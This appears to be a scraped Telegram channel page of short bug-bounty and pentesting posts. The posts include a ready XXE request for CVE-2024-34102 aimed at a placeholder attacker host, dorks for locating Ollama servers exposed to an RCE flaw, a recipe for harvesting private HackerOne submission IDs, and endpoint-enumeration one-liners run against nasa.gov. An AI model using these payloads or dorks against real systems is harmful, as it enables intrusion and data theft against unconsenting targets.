NEW BOT Телеграм, страница

🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐

#infosec #cybersecurity #hacking #pentesting #security

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥3❤‍🔥1

1.93K viewsSaumadip Mandal, edited 09:57

Brut Security

▶️

This June Batch Filled with talented Students 🫶

👀

July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

🤯1

1.86K viewsSaumadip Mandal, 11:49

Brut Security

Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity

1.84K viewsSaumadip Mandal, edited 12:24

Brut Security

🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability

⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

🔥PoC: https://lnkd.in/gk6Wvq_P

💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"

🔥1

1.89K viewsSaumadip Mandal, 19:23

Brut Security

🛡Join The Discussion Group

🔗

https://news.1rj.ru/str/brutsec

Please open Telegram to view this post

VIEW IN TELEGRAM

Discussion

Community Discussion

1.86K viewsSaumadip Mandal, 19:25

Brut Security

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

👍8

1.96K viewsSaumadip Mandal, 19:53

Brut Security

Brut Security pinned a photo

19:59

Brut Security

IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino

HackerOne

HackerOne | Global leader in offensive security | Security for AI | Crowdsourced Security

HackerOne combines AI with the ingenuity of the largest community of security researchers to find and fix security, privacy, and AI vulnerabilities across the SDLC. HackerOne offers AI red teaming, crowdsourced security, bug bounty, vulnerability disclosure…

👍3

1.97K viewsSaumadip Mandal, 12:53

Brut Security

China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司"

It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.

tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.

Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA

#github #gitcode

🐳3👍1

1.84K viewsSaumadip Mandal, 14:42

Brut Security

1.79K viewsSaumadip Mandal, 14:53

Brut Security

Looking for someone who can contribute on the next 30 days Bug Bounty Challenge. Similar to this https://nas.io/brutsecurity

⚠️

As I have asked everyone, I will elaborate it more here:

🌐

That we need contributors who want to contribute for 30 days Bug Bounty Challenge. Where the participants can Learn from day 1 to day 30 , as there would be guidance have to provide. e.g:
Day 1: Run Subfinder
Day 2: Scrap Js
Day 3: Report etc. till day 30.

🙂

If you want to collaborate or participate make a Day 1 to Day30 challenge or a topic, DM it to me @wtf_brut or you can DM here 🔽

Please open Telegram to view this post

VIEW IN TELEGRAM

Discussion

Community Discussion

2.04K viewsSaumadip Mandal, edited 16:57

Brut Security

⚠️

No Foul Language Will Be Tolerated in the Comments or in the community discussion

⚠️

Please open Telegram to view this post

VIEW IN TELEGRAM

1.92K viewsSaumadip Mandal, 17:12

Brut Security

Brut Security pinned «💥Join Our Bugbounty Discussion Group 💥 🔥https://news.1rj.ru/str/brutsec🔥 🤖https://discord.gg/GZBsQMY6🤖»

17:13

Brut Security

⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit

📌A Windows penetration testing environment that works out of the box.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

🔗Link: https://lnkd.in/gtX3GbR8

🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity

🔥1

1.89K viewsSaumadip Mandal, 05:49

Brut Security

0:13

This media is not supported in your browser

VIEW IN TELEGRAM

📢You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

📝Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:

⚠Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

👍2🔥1

2.18K viewsSaumadip Mandal, 10:59

About

Blog

Apps

Platform